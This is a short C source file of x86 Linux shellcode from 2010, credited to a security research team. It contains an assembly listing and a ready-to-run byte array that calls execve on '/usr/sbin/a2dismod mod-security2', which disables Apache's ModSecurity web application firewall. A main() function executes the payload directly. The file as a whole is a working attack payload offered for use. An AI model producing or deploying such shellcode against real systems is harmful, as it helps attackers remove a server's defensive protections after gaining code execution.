/* sekfault@shellcode.com.ar - Goodfellas Security Research Team - 2010
* /usr/sbin/a2dismod mod-security2 - disable modsecurity
* 64 bytes
*__asm__(
* "xor %eax,%eax \n"
* "push %eax \n"
* "cdq \n"
* "push $0x646f6d73 \n"
* "push $0x69643261 \n"
* "push $0x2f6e6962 \n"
* "push $0x732f7273 \n"
* "push $0x752f2f2f \n"
* "mov %esp,%ebx \n"
* "push $0x32 \n"
* "push $0x79746972 \n"
* "push $0x75636573 \n"
* "push $0x2d646f6d \n"
* "mov %esp,%ecx \n"
* "xor %edx,%edx \n"
* "mov $0xb,%al \n"
* "push %edx \n"
* "push %ecx \n"
* "push %ebx \n"
* "mov %esp,%ecx \n"
* "mov %esp,%edx \n"
* "int $0x80 \n"
);
*/
char shellcode[]="\x31\xc0\x50\x99\x68\x73\x6d\x6f\x64\x68\x61\x32\x64\x69\x68\x62\x69\x6e\x2f\x68\x73\x72\x2f\x73\x68\x2f\x2f\x2f\x75\x89\xe3\x6a\x32\x68\x72\x69\x74\x79\x68\x73\x65\x63\x75\x68\x6d\x6f\x64\x2d\x89\xe1\x31\xd2\xb0\x0b\x52\x51\x53\x89\xe1\x89\xe2\xcd\x80";
int main()
{
(*(void(*)())shellcode)();
return 0;
}